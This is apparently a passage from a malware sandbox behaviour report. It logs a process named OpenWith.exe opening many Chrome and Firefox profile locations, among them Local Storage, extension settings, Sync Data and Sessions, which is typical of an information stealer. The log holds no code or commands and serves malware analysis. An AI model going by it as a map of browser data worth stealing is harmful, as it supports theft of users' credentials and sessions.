File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnails |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0 |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtab |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache |